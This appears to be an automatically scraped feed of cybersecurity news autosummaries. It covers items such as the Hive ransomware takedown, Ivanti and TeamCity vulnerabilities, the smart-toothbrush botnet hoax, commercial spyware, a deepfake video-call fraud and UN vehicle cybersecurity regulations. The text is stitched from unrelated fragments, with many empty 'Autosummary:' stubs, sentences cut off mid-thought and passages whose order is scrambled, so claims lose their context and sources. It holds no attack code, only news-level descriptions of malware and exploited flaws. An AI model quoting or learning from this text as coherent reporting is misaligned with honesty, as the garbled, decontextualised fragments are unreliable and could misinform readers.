"Since late July 2022, the FBI has penetrated Hive"s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded," the Justice Department said. "Autosummary:
"Autosummary:
Here’s what the newspaper has said (computer-translated for us who don’t understand German): What is now described by the Fortinet headquarters in California as a “translation problem” has listened to the research in a completely different way: Swiss Fortinet representatives have described the toothbrush case as a real DDoS attack at an appointment, which dealt with current threat situations. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Lianne Potter – @Tech_Soapbox Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "Autosummary:
The authorities reported that from June 2021 through at least November 2022, threat actors targeted a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). "Autosummary:
"Autosummary:
"Autosummary:
"Despite reported threat detection, investigation, and response (TDIR) improvements in security operations, more than half of organizations still experienced significant security incidents in the last year, according to Exabeam. North America experienced the highest rate of security incidents (66%), closely followed by Western Europe (65%), then Asia Pacific and Japan (APJ) (34%). Gap between self-reported security measures and reality The findings reveal a significant gap between self-reported security measures and reality. Despite 57% of interviewed … More
The post Cybersecurity teams hesitate to use automation in TDIR workflows appeared first on Help Net Security.
"Autosummary:
Despite 57% of interviewed organizations reporting significant security incidents, over 70% of organizations reported better performance on cybersecurity key performance indicators (KPIs), such as mean time to detect, investigate, respond, and remediate in 2023 as compared to 2022, and 90% believe they have good or excellent ability to detect cyberthreats. "Autosummary:
"Autosummary:
"Autosummary:
In December 2023, Fortinet urged its customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. "Autosummary:
Other blocks we encountered during our research: Malwarebytes Premium blocks 188.114.96.0 Malwarebytes Premium blocks the subdomain oyglk.altairaquilae.top How to recover from a Facebook scam You can recognize this type of scam because they usually tag several friends of the victim. These browser push notifications are a very annoying type of advertising, often associated with tech support scams, explicit content, gambling, and anything else that pays a handsome referral bonus. First Facebook scam Translation: Deadly accident on highway causes several fatalities Notable about this one is that it was posted as a fundraiser and does not allow comments, which blocks me from posting a warning that this is a scam. "Though there are organizations out there investigating how commercial spyware is misused to target journalists, human rights defenders and dissidents, the growing market related to the development and sale of this type of software and the exploits used to deploy it is still very much shrouded in mystery. “While prominent [commercial spyware vendors] garner public attention and headlines, there are dozens of others that are less noticed, but play an important role in developing spyware,” … More
The post The fight against commercial spyware misuse is heating up appeared first on Help Net Security.
"Autosummary:
In related news, on Monday, US Secretary of State Antony Blinken announced that the State Department is implementing a new policy that will allow the imposition of visa restrictions on: Individuals involved in the misuse of commercial spyware to surveil, harass, or intimidate “journalists, activists, other persons perceived to be dissidents for their work, members of marginalized communities or vulnerable populations, or the family members of these targeted individuals” Individuals believed to facilitate or derive financial benefit from such misuse of commercial spyware (e.g., commercial spyware vendors, and brokers) "DynaRisk launched Cyber Intelligence Data Lake. This major feature upgrade propels the company’s capabilities in preventing and predicting hacker activity. DynaRisk’s Cyber Intelligence Data Lake is a leap forward in the cyber risk management landscape, offering next-generation intelligence quickly and at scale. DynaRisk’s new Data Lake contains vast amounts of recovered data stolen by Infostealer malware. The company has intelligence on 6 million hacked devices, 20 million stolen credentials, 30 million stolen emails and 11 … More
The post DynaRisk Cyber Intelligence Data Lake enhances the accuracy of data breach predictions appeared first on Help Net Security.
"Autosummary:
Infostealers, which played a pivotal role in high-profile cyber incidents such as the MGM attack, are types of malware engineered to extract sensitive information such as clear text passwords, website cookies, credit cards, crypto wallets, documents and other data from hacked PCs and phones, often covering their tracks to avoid detection. "JetBrains has patched a critical authentication bypass vulnerability (CVE-2024-23917) affecting TeamCity On-Premises continuous integration and deployment servers. About CVE-2024-23917 CVE-2024-23917 could allow an unauthenticated threat actor with HTTP(S) access to a TeamCity server to bypass authentication controls and gain administrative privileges on the server. The vulnerability was first identified and reported by an external security researcher on January 19, 2024, and affects all versions of TeamCity On-Premises from 2017.1 through 2023.11.2. “We have fixed this … More
The post On-premises JetBrains TeamCity servers vulnerable to auth bypass (CVE-2024-23917) appeared first on Help Net Security.
"Autosummary:
"CVE-2024-21893, a server-side request forgery (SSRF) vulnerability affecting Ivanti Connect Secure VPN gateways and Policy Secure (a network access control solution), is being exploited by attackers. About CVE-2024-21893 CVE-2024-21893 allows a attackers to bypass authentication requirements and access certain restricted resources on vulnerable solutions. It affects the SAML component of: Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x) Ivanti Neurons for ZTA (SaaS-delivered zero trust network access solution) Its existence, along with that … More
The post Ivanti Connect Secure flaw massively exploited by attackers (CVE-2024-21893) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The table below presents a list of vehicle categories covered by the requirements of UN Regulations 155 and 156: Vehicle category Category description Applicable requirements L6 Four-wheeled vehicles with a mass not exceeding 350 kg, engine displacement of 50 cc or less, and maximum design speed of 45 km/h UN 155, if the vehicle complies with Level 3 automation or higher L7 Four-wheeled vehicles with a mass not exceeding 400 kg and maximum continuous rated power of no more than 15 kW UN 155, if the vehicle complies with Level 3 automation or higher M Vehicles with four or more wheels, designed to carry passengers UN 155 and UN 156 N Vehicles with four or more wheels, designed to carry cargo UN 155 and UN 156 O Trailers with at least one ECU UN 155 and UN 156 R Agricultural trailers UN 156 S Interchangeable towed agricultural and logging equipment UN 156 T Any motorized, wheeled, or tracked agricultural equipment with at least two wheeled axles, capable of moving faster than 6 km/h UN 156 Starting in July 2024, UN Regulations 155 and 156 will become mandatory not only for new types of vehicles, but also for all new vehicles produced. The automotive industry has a geographically and hierarchically distributed and functionally complex supply chain that includes: the vehicle manufacturer itself (OEM – Original Equipment Manufacturer); suppliers of individual vehicle systems and modules (Tier 1 suppliers), such as the gearbox, infotainment module, or engine control unit; their suppliers that make the individual components of the systems and modules, for example, microcircuits, sensors, controllers, operating systems, bearings, actuators, etc.The broad range of functions (engine control, fuel system control, passenger safety, autopilot, infotainment system), architectures of communication interfaces used by individual components (CAN, LIN, Ethernet, Wi-Fi), communication links with external services and entities (Bluetooth, Wi-Fi, LTE) create a huge cyberattack surface in vehicles. Risks for the manufacturer’s ICT infrastructure A vehicle manufacturer is an industrial organization whose structure combines the ordinary ICT infrastructure of a back office, i.e., auxiliary and supporting business units (accounting department, legal department, logistical support for the office, etc.), with the infrastructure of the development unit, the production segment, and the servers of the supporting infrastructure. The consequences of a successful attack on a vehicle may include the theft or modification of data (personal data, payment information, and other user data), installation of malicious code/firmware, disruption or manipulation of individual vehicle functions, theft of the vehicle, physical damage to the vehicle, and injury or death of drivers, passengers, and pedestrians. Relevant cybersecurity risks In the automotive industry, cybersecurity requirements apply at least to the following objects: the product itself – that is, the vehicle and its components; supporting infrastructure – for example, servers for updating the firmware of electronic control units (ECU); the manufacturer’s ICT infrastructure, whose security is important for the development, manufacture, and subsequent support of products; supply chain of a vehicle’s individual electronic components and systems. Production phase According to ISO 21434, when the production phase begins, it is necessary to analyze all production operations and develop a production control plan that includes: a description of the steps to implement the cybersecurity requirements for the production, operation and maintenance and decommissioning phases (the standard combines these phases into a single post-development phase); a list of equipment and tools for the production phase; security controls to prevent unauthorized changes in production; procedures for evaluating the completeness of implementation and validating the security requirements for the production, operation and maintenance and decommissioning phases. To maintain the cybersecurity of the vehicle, it is necessary to: monitor information about discovered vulnerabilities and changes in the threat landscape; establish security monitoring of the supporting infrastructure and incident response processes; establish monitoring of information about compromised suppliers and processes for responding to incidents involving supply chains and trusted (authorized) partners; rapidly respond to vulnerabilities, threats and incidents, including developing and installing patches, notifying users, and reassessing risks. The following are examples of attacks on supporting infrastructure: uploading and installing a fake update; uploading fake backup copies of data or configurations; sending illegitimate commands from an adversary’s C&C server to a vehicle; attack on the servers of supporting infrastructure (for example, network management servers for charging stations) and the subsequent leaking of personal data and payment information; changes made while servicing a vehicle at an auto repair shop that result in a breach of security (configuration changes, deployment of a rootkit, etc.).To obtain them, a vehicle manufacturer must demonstrate that the organizational processes listed above comply with the following requirements as part of cybersecurity management and update management: threat assessment and risk analysis (TARA); continuous monitoring, incident detection and response; vulnerability management; component supply chain management and service management; security update management; notification of supervisory bodies regarding the results of cybersecurity monitoring, including any cyberattacks. Risks of attacks on supporting infrastructure can be minimized by implementing a proper network topology and segmentation, secure protocols for authentication, authorization, and data encryption, antivirus protection, procedures for controlling access to the system, vulnerability management, and incident monitoring and response. An acceptable option for implementing cybersecurity practices could be the following sequence of steps: establish a cybersecurity management system, i.e., develop and implement basic cybersecurity procedures and policies within the organization; develop a cybersecurity plan that defines the list of protective measures and stages for their implementation; secure the company’s ICT infrastructure by minimizing the risk of attacks on development departments and production sites; secure supporting infrastructure and external services by minimizing the risk of an attack on a vehicle under development or in use; ensure that the project lifecycle meets relevant cybersecurity requirements, from design and secure development to vehicle decommissioning and the recycling of individual components. Risk management for the manufacturer’s ICT infrastructure When it comes to risk management for the ICT infrastructure, it should be kept in mind that the vehicle manufacturer needs to view the ICT infrastructure as the starting point of complex attacks whose ultimate target is the vehicle, supporting infrastructure, and the data of passengers and vehicle owners (individuals as well as legal entities).According to ISO 26262, the lifecycle of a vehicle project is divided into 5 phases (we will use this division, because the phases defined in ISO 26262 are more detailed than those in ISO 21434): concept phase; product development phase; production phase; operation and maintenance phase; end of cybersecurity support and decommissioning phase. Some functionality (monitoring, secure downloading and installation of updates, user/owner change scenarios, etc.) is implemented in the vehicle, and some is implemented in supporting infrastructure.Three phases are identified in the project lifecycle: the concept phase, the development phase (which includes cybersecurity development and validation) and the post-development phase (which includes production, operation, and maintenance, as well as the end of cybersecurity support and decommissioning). Requirements of UNECE and international standards UN Regulations 155 and 156 contain top-level requirements that can be divided into two categories: process-oriented requirements, which have to do with security management at the level of the organization, and project-oriented requirements, which have to do with ensuring the security of everything being produced – whether the vehicles themselves or individual systems and components. "Autosummary:
Linux distributions that utilize Shim, such as Red Hat, Debian, Ubuntu, and SUSE, have released advisories with information on the flaw. "Autosummary:
Ransom payment size trends Source: Chainalysis Regarding the laundering of ransom payments, Chainalysis says that in 2023, ransom payments were primarily passed through mixing services, underground exchanges, instant exchangers, sanctioned entities, and platforms that do not have know-your-customer (KYC) requirements in place. "Autosummary:
"We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News. "Autosummary:
"Autosummary:
TeamCity On-Premises Pierluigi Paganini February 07, 2024 February 07, 2024 A new vulnerability in JetBrains TeamCity On-Premises can be exploited by threat actors to take over vulnerable instances. "Autosummary:
found a critical bug that exists in every Linux boot loader signed in the past decade 🥰 https://t.co/kjATsR4uvJ https://t.co/JrECpgGmWD pic.twitter.com/oKEl7PTUSp — Bill Demirkapi (@BillDemirkapi) January 24, 2024 “Discovered and reported by Bill Demirkapi at Microsoft’s Security Response Center, this particular vulnerability stems from HTTP protocol handling, leading to an out-of-bounds write that can lead to complete system compromise.” "Autosummary:
Hackers exploited a second IOS and IOS XE zero-day last year in attacks, a bug that enabled them to execute arbitrary code, gain complete control of vulnerable systems, and trigger denial of service (DoS) conditions. "Autosummary:
DocuSign file fetching PowerShell script Source: Trustwave At this stage, Trustwave observed four distinct malware loading methods, namely: malicious Control Panel (CPL) files executing remote PowerShell scripts, weaponized HTML files (HTML smuggling) containing base64-encoded ZIP files with malicious contents, LNK files masqueraded as text files but actually acting as download shortcuts, SVG files containing embedded .RAR files (SVG smuggling). "Autosummary:
None of this has stopped numerous newspapers and websites around the world from repeating the “Beware, your electric toothbrush may have been hacked” headlines, because… …well, because it makes such a good story.Here are a few headlines from the last 24 hours or so, about a supposed smart toothbrush botnet launching a distributed denial-of-service (DDoS) attack: And there were many more… The reports were inspired by a report last week in the Swiss newspaper Aargauer Zeitung. "In this Help Net Security video, Dan Erel, VP of Security at SeeMetrics, discusses NIST Cybersecurity Framework (CSF) 2.0. NIST CSF is based on existing standards, guidelines, and practices for organizations to manage and reduce cybersecurity risk better. It was designed to foster risk and cybersecurity management communications amongst internal and external organizational stakeholders. Read more: 10 cybersecurity frameworks you need to know about
The post Exploring NIST Cybersecurity Framework 2.0 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Our list of cybersecurity books has been curated to steer your professional growth in 2024. This selection aims to provide comprehensive information security insights and knowledge, ensuring you stay ahead in your career learning journey throughout the year. Cyber for Builders: The Essential Guide to Building a Cybersecurity Startup Author: Ross Haleliuk Cyber for Builders provides an overview of the cybersecurity industry from entrepreneurial lenses, breaks down the role of various industry players, from investors … More
The post 10 must-read cybersecurity books for 2024 appeared first on Help Net Security.
"Autosummary:
Author: Cesar Bravo, Desilda Toska You’ll learn the most intriguing psychological principles exploited by attackers, including influence, manipulation, rapport, persuasion, and empathy, and gain insights into how attackers leverage technology to enhance their attacks using fake logins, email impersonation, fake updates, and executing attacks through social media.Moreover, the book is packed with mental models, notes, and advice to help early-stage cybersecurity founders get their ideas off the ground and solve problems young companies face around problem discovery, hiring, building products, and fundraising. "Autosummary:
"IBM announced IBM LinuxONE 4 Express, extending the latest performance, security and AI capabilities of LinuxONE to small and medium sized businesses and within new data center environments. The pre-configured rack mount system is designed to offer cost savings and to remove client guess work when spinning up workloads quickly and getting started with the platform to address new and traditional use cases such as digital assets, medical imaging with AI, and workload consolidation. Building … More
The post IBM LinuxONE 4 Express protects sensitive private data appeared first on Help Net Security.
"Autosummary:
Activating the IBM Ecosystem for client success With the IBM LinuxONE Ecosystem, including AquaSecurity, Clari5, Exponential AI, Opollo Technologies, Pennant and Spiking, IBM is working to provide solutions for today’s sustainability and cybersecurity challenges.IBM brings the power of hybrid cloud and AI in the latest LinuxONE 4 system to a simple, easy to use format that fits in many data centers,” said Tina Tarquinio, VP, Product Management, IBM Z and LinuxONE. "Autosummary:
A majority of the compromised websites are based in India, Taiwan, Thailand, Vietnam, China, Australia, and Turkey, although compromises have also been reported from Brazil, the U.S., Turkey, Russia, Mexico, and Italy. "Autosummary:
"Autosummary:
The data that was exposed varies per employee but could include: Full name Physical address Social Security number (SSN) National ID Gender Union affiliation Date of birth Compensation information However, this incident does not appear to impact customer information. "Autosummary:
The search engine, catering to a diverse user base, is available in English, French, Arabic, Korean, and Japanese, and is utilized across 160 countries worldwide. "Autosummary:
Passwords Google and Microsoft made good on their promise to back passkeys, an encryption-based alternative to passwords that can’t be stolen, guessed, cracked, or phished. As home users, many of the threats we cover will only affect you second hand, such as disruptions after a company suffers a ransomware attack, or when your private information is sold online after a data breach. "Autosummary:
Its activity is built around evergreen techniques like phishing, software exploits, and password guessing, along with mature malicious technologies like info stealers, trojans, and ransomware. "Autosummary:
" RAT malware survives firmware upgrades During the follow-up investigation, a previously unknown malware strain named Coathanger, a remote access trojan (RAT) designed to infect Fortigate network security appliances, was also discovered on the breached network. "Autosummary:
Other service providers using Viamedis, including Carte Blanche Partenaires, Itelis, Kalixia, Santéclair, and Audiens, are expected to experience similar situations. "Autosummary:
"Autosummary:
- Google Those spyware vendors use the zero-day flaws to target journalists, activists, and political figures as directed by their customers, including governments and private organizations. "When we discover and patch vulnerabilities used in exploit chains, it not only protects users, but prevents CSVs from meeting their agreements to customers, preventing them from being paid, and increasing their costs to continue operating. "Autosummary:
The latest report published by Google Threat Analysis Group (TAG), titled “Buying Spying, an in-depth report with our insights into Commercial Surveillance Vendors (CSVs)”, warns of the rise of commercial spyware vendors and the risks to free speech, the free press, and the open internet. "Autosummary:
"Cybersecurity strategies are essential components of modern organizations, designed to protect digital assets, sensitive information, and overall business continuity from potential cyber threats. As technology advances, the complexity and frequency of cyber attacks continue to grow, making it imperative for businesses to develop robust and adaptive cybersecurity strategies. In this round-up from Help Net Security, cybersecurity experts address various aspects of cybersecurity strategies and challenges. Complete videos Keith Neilson, Technical Evangelist at CloudSphere, illustrates how … More
The post How cybersecurity strategies adapt to evolving threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Mispadu, once launched, reveals its true colors by selectively targeting victims based on their geographic location (i.e., Americas or Western Europe) and system configurations, and then proceeds to establish contact with a command-and-control (C2) server for follow-on data exfiltration. "Autosummary:
"Autosummary:
A security mess The disclosure of CVE-2024-21893 came along with the release of security updates for two other zero-days impacting the same products, CVE-2023-46805 and CVE-2024-21887, which Ivanti first discovered on January 10, 2024, sharing temporary mitigations. "A deepfake video conference call paired with social engineering tricks has led to the theft of over US$25 million from a multinational firm, the South China Morning Post has reported. The scheme and the deepfake video conference call The attack started with messages sent to several of the firm’s employees, but it seems that only one – employed in the finance department of the company’s Hong Kong branch’s – was ultimately bamboozled. According to the … More
The post Deepfaked video conference call makes employee send $25 million to scammers appeared first on Help Net Security.
"Autosummary:
In the past, we would assume these scams would only involve two people in one-on-one situations, but we can see from this case that fraudsters are able to use AI technology in online meetings, so people must be vigilant even in meetings with lots of participants,” Chan Shun-ching said during a press event. "Varonis introduced Varonis Managed Data Detection and Response (MDDR), a managed service dedicated to stopping threats at the data level. Unlike traditional MDR services that are endpoint- and network-centric, MDDR focuses on threats to data. The offering combines Varonis’ award-winning threat detection technology and automation with a global team of elite threat hunters, forensics analysts, and incident responders who investigate and respond to threats 24x7x365. “Organizations pay millions of dollars for threat detection products and … More
The post Varonis MDDR helps organizations prevent data breaches appeared first on Help Net Security.
"Autosummary:
“Organizations pay millions of dollars for threat detection products and services, yet when an incident occurs, they struggle to answer the most important question, ‘Was any data stolen?’” said Matt Radolec, Varonis VP of Incident Response and Cloud Operations. "Autosummary:
Privee Talk (com.priv.talk) MeetMe (com.meeete.org) Let"s Chat (com.letsm.chat) Quick Chat (com.qqc.chat) Rafaqat رفاق (com.rafaqat.news) Chit Chat (com.chit.chat) YohooTalk (com.yoho.talk) TikTalk (com.tik.talk) Hello Chat (com.hello.chat) Nidus (com.nidus.no or com.nionio.org) GlowChat (com.glow.glow) Wave Chat (com.wave.chat) Rafaqat رفاق is notable for the fact that it"s the only non-messaging app and was advertised as a way to access the latest news. "Autosummary:
"Autosummary:
Urban, who went by the aliases Sosa, Elijah, King Bob, Anthony Ramirez, and Gustavo Fring, is said to be a key member of the cybercrime group known as Scattered Spider, according to KrebsOnSecurity, as well as a "top member" of a broader cybercrime ecosystem that calls itself The Com. "Autosummary:
"Autosummary:
Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.When an organization refuses to pay, the attacking ransomware group will typically publish the organization’s details, along with its data, on their leak site, which are our main source of information about who did what to who.Despite a business continuity plan, the incident resulted in wide-scale disruptions to the company’s operations throughout the quarter, which ended September 30, 2023. "Autosummary:
A journalist from the Guardian found out that through her Tinder profile, the app collected around 800 pages worth of data about her, including likes, interests, photos, friends, and romantic preferences.Whether that’s doing a bit of social media checking, meeting in person, asking questions that require specific knowledge, or asking for proof of identity – all of these things will give you that reassurance that tanned Caroline from Ohio really is tanned Caroline from Ohio, and not mousy Clive from Seattle.Far too commonly, online daters have fallen for fake sob stories that their online crush needs money to help pay for the medical bills of their sick relative, their fledgling business isn’t going as well as they hoped, or that they should take advantage of a once-in-a-lifetime investment opportunity.They may go on social media to find out more about their target’s hobbies, beliefs, and habits, using this information to give the illusion of common interests, helping to create an even stronger bond. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Prioritizing cybercrime intelligence for effective decision-making in cybersecurity In this Help Net Security interview, Alon Gal, CTO at Hudson Rock, discusses integrating cybercrime intelligence into existing security infrastructures. Proactive cybersecurity: A strategic approach to cost efficiency and crisis management In this Help Net Security interview, Stephanie Hagopian, VP of Security at CDW, discusses offensive strategies in the face of complex … More
The post Week in review: Windows Event Log zero-day, exploited critical Jenkins RCE flaw appeared first on Help Net Security.
"Autosummary:
Hundreds of network operators’ credentials found circulating in Dark Web Resecurity conducted extensive monitoring of the Dark Web, uncovering over 1,572 customers of RIPE, APNIC, AFRINIC, and LACNIC who were compromised due to malware activity involving well-known password stealers like Redline, Vidar, Lumma, Azorult, and Taurus. Global critical infrastructure faces relentless cyber activity In the last year, the world’s critical infrastructure – the medical, power, communications, waste, manufacturing, and transportation equipment that connects people and machines – has been under near-constant attack, according to Forescout. "Autosummary:
"Autosummary:
Lurie Children’s Hospital offers a wide range of specialized medical services, including pediatric surgery, oncology, cardiology, neurology, and neonatology. "Autosummary:
However, the sudo settings provide some clues as to how the command will work, with the ability to run sudo applications "In a new windows", "With input disabled", and "Inline". "Autosummary:
“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned six officials in the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), an Iranian government organization responsible for a series of malicious cyber activities against critical infrastructure in the United States and other countries.” "Autosummary:
"Autosummary:
"Autosummary:
Clorox estimates the costs of the August cyberattack will exceed $49 Million Pierluigi Paganini February 03, 2024 February 03, 2024 Cleaning products giant Clorox estimates the economic impact of the cyber attack that hit the company in August 2023 at $49 million. "Autosummary:
"Autosummary:
"The European Commission adopted the implementing regulation concerning the EU cybersecurity certification scheme on Common Criteria (EUCC). The outcome aligns with the candidate cybersecurity certification scheme on EUCC that ENISA drafted in response to a request issued by the European Commission. In drafting the candidate scheme, ENISA was supported by an Ad-hoc working group (AHWG) composed of area experts from across the industry and EU Member States National Cybersecurity Certification Authorities (NCCAs). ENISA is grateful … More
The post EU adopts first cybersecurity certification scheme for safer tech appeared first on Help Net Security.
"Autosummary:
Voluntary-based, the new EUCC scheme allows ICT suppliers who wish to showcase proof of assurance to go through an EU commonly understood assessment process to certify ICT products such as technological components (chips, smartcards), hardware and software. EU Agency for Cybersecurity Executive Director Juhan Lepassaar underscored that “The adoption of the first cybersecurity certification scheme marks a milestone towards a trusted EU digital single market, and it is a piece of the puzzle of the EU cybersecurity certification framework that is currently in the making.” "Autosummary:
"Autosummary:
This sophisticated intelligence, allows us to act promptly against threats like Ransomware, APT(Advanced Persistent Threats), C2 (Command and Control) servers, malware, and more Upon thorough evaluation of these reports and confirmation that the implicated accounts are indeed conducting illegal activities and are not victims, Cloudzy systematically bans these accounts. "Autosummary:
"Autosummary:
PurpleFox malware infected at least 2,000 computers in Ukraine Pierluigi Paganini February 02, 2024 February 02, 2024 The Computer Emergency Response Team in Ukraine (CERT-UA) reported that a PurpleFox malware campaign had already infected at least 2,000 computers in the country. "Autosummary:
The US Cybersecurity and Infrastructure Security Agency (CISA) warned US businesses in May, 2023 about Volt Typhoon, an elite squadron of hackers with ties to the Chinese government, that targets high-value entities like governments, large corporations, and critical infrastructure. "Autosummary:
APT28 is also tracked by the broader cybersecurity community under the names Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. "Autosummary:
The attack is said to be related to a threat actor known as Shuckworm, which is also known as Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder. "Autosummary:
"As Illinois" leading provider for pediatric care, our overarching priority is to continue providing safe, quality care to our patients and the communities we serve," continues the hospital"s announcement. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @BleepinComputer, @billtoulas, @demonslay335, @serghei, @fwosar, @CyberArk, @coveware, @pcrisk, @USGAO, @Jon__DiMaggio, @ThierryBreton, @Truesec, @Analyst1, @AhnLab_SecuInfo, @RakeshKrish12, @Netenrich, @jgreigj, and @AJVicens. For hospitals, this means that they no longer have access to medical charts, can"t prescribe electronic prescriptions, respond to patients through online portals, or in some cases, access medical diagnostic reports. Most federal agencies that lead and manage risk for 4 critical sectors—manufacturing, energy, healthcare and public health, and transportation systems—have assessed or plan to assess risks associated with ransomware. "Autosummary:
Albania"s cyber agency AKCESK is now collaborating with state… — The Record From Recorded Future News (@TheRecord_Media) February 2, 2024 In December 2023, Albania’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed that cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania. Pierluigi Paganini February 02, 2024 February 02, 2024 Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. "Autosummary:
"Autosummary:
"In this Help Net interview, Isaac Evans, CEO at Semgrep, discusses the balance between speed and thoroughness in CI/CD pipeline security scanning. Stressing the need to avoid slowing down the process, he recommends a nuanced approach, utilizing custom rules to tailor security findings to an organization’s coding practices. Evans also discusses the impact of a developer-first approach, the significance of minimizing false positives, and highlights the potential of modern security tools, particularly those integrating AI … More
The post Custom rules in security tools can be a game changer for vulnerability detection appeared first on Help Net Security.
"Autosummary:
Evans also discusses the impact of a developer-first approach, the significance of minimizing false positives, and highlights the potential of modern security tools, particularly those integrating AI and secure code development guardrails.When presented with the developer-first approach described above, modern security tools can thus protect the organization from additional impact, and especially compared to legacy tools, significantly accelerate the time to issue resolution. "As organizations handle increasing amounts of data daily, AI offers advanced capabilities that would be harder to achieve with traditional methods. In this Help Net Security video, Tyler Young, CISO at BigID, explores AI’s challenges, triumphs, and future in cybersecurity.
The post Unpacking the challenges of AI cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"A financially motivated threat actor tracked as UNC4990 is using booby-trapped USB storage devices and malicious payloads hosted on popular websites such as Ars Technica, Vimeo, GitHub and GitLab to surreptitiously deliver malware. Another interesting detail about UNC4990 it’s mostly targeting organizations located in Italy (particularly within the health, transportation, construction, and logistics sectors) and is likely based in that country, as well. “Based on the extensive use of Italian infrastructure throughout UNC4990 operations, including … More
The post Threat actor used Vimeo, Ars Technica to serve second-stage malware appeared first on Help Net Security.
"Autosummary:
Among those is a backdoor named QUIETBOARD, “capable of arbitrary command execution, clipboard content manipulation for crypto currency theft, USB/removable drive infection, screenshotting, system information gathering, and communication with the C2 server,” as well “the capability of modular expansion and running independent Python based code/modules.” "Autosummary:
This article will help you identify and define the key metrics that you need to track the state of your vulnerability management program, the progress you"ve made, so you can create audit-ready reports that: Prove your security posture Meet vulnerability remediation SLAs and benchmarks Help pass audits and compliance Demonstrate ROI on security tools Simplify risk analysis Prioritize resource allocation Why you need to measure vulnerability management Metrics play a critical role in gauging the effectiveness of your vulnerability and attack surface management.Cyber hygiene, scan coverage, average time to fix, vulnerability severity, remediation rates, vulnerability exposure… the list is endless. When a new vulnerability that could critically affect your systems is identified, Intruder will automatically kick-off a scan Attack surface monitoring This helps you see the percentage of assets that are protected across your attack surface, discovered or undiscovered. As your attack surface evolves, changes and grows over time, it"s important to monitor any changes to what"s covered and your IT environment, such as recently opened ports and services. "Autosummary:
" Furthermore, the attacks are characterized by the use of open-source utilities like Impacket, CrackMapExec, iodine, and Enum4linux to support post-exploitation activity on Ivanti CS appliances, including network reconnaissance, lateral movement, and data exfiltration within victim environments. "Autosummary:
Multiple malware used in attacks exploiting Ivanti VPN flaws Pierluigi Paganini February 01, 2024 February 01, 2024 Mandiant spotted new malware used by a China-linked threat actor UNC5221 targeting Ivanti Connect Secure VPN and Policy Secure devices. "Autosummary:
"Autosummary:
" Unnoficial security patches for affected Windows systems The 0patch micropatching service released unofficial patches for most affected Windows versions on Wednesday, available for free until Microsoft releases official security updates to address the zero-day bug: Windows 11 v22H2, v23H2 - fully updated Windows 11 v21H2 - fully updated Windows 10 v22H2 - fully updated Windows 10 v21H2 - fully updated Windows 10 v21H1 - fully updated Windows 10 v20H2 - fully updated Windows 10 v2004 - fully updated Windows 10 v1909 - fully updated Windows 10 v1809 - fully updated Windows 10 v1803 - fully updated Windows 7 - no ESU, ESU1, ESU2, ESU3 Windows Server 2022 - fully updated Windows Server 2019 - fully updated Windows Server 2016 - fully updated Windows Server 2012 - no ESU, ESU1 Windows Server 2012 R2 - no ESU, ESU1 Windows Server 2008 R2 - no ESU, ESU1, ESU2, ESU3, ESU4 "Since this is a "0day" vulnerability with no official vendor fix available, we are providing our micropatches for free until such fix becomes available," Kolsek said. "The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell (CVE-2021-44228) and PwnKit (CVE-2021-4034) vulnerabilities for lateral movement and privilege escalation. The FritzFrog botnet The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally-controlled) botnet powered by malware written in Golang. It targets SSH servers by brute-forcing login credentials, and has managed to compromise thousands of them worldwide. “Each compromised host … More
The post FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities appeared first on Help Net Security.
"Autosummary:
The FritzFrog botnet The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally-controlled) botnet powered by malware written in Golang. "Qualys is expanding Qualys CyberSecurity Asset Management (CSAM) to identify unmanaged and untrusted devices in real-time. Leveraging the Qualys Cloud Agent to continuously monitor the network, this passive discovery method complements scans, agents, and API-based discovery to build a comprehensive asset inventory, calculate the TruRisk of every asset, and eliminate risk based on business impact. 69% of organizations said they experienced at least one cyberattack resulting from an exploit of an unknown or unmanaged asset … More
The post Qualys enhances CyberSecurity Asset Management to discover risky unmanaged devices appeared first on Help Net Security.
"Autosummary:
In navigating intricate enterprise landscapes, real-time visibility of the entire infrastructure is difficult, and at times, appears impossible,” said Gary Bowen, director of Security Operations, Brown & Brown Insurance. "Autosummary:
Those installing the apps became infected with VajraSpy, allowing the malware to steal personal data, including contacts and messages, and depending on the granted permissions, even to record their phone calls.An Android remote access trojan (RAT) known as VajraSpy was found in 12 malicious applications, six of which were available on Google Play from April 1, 2021, through September 10, 2023. "Autosummary:
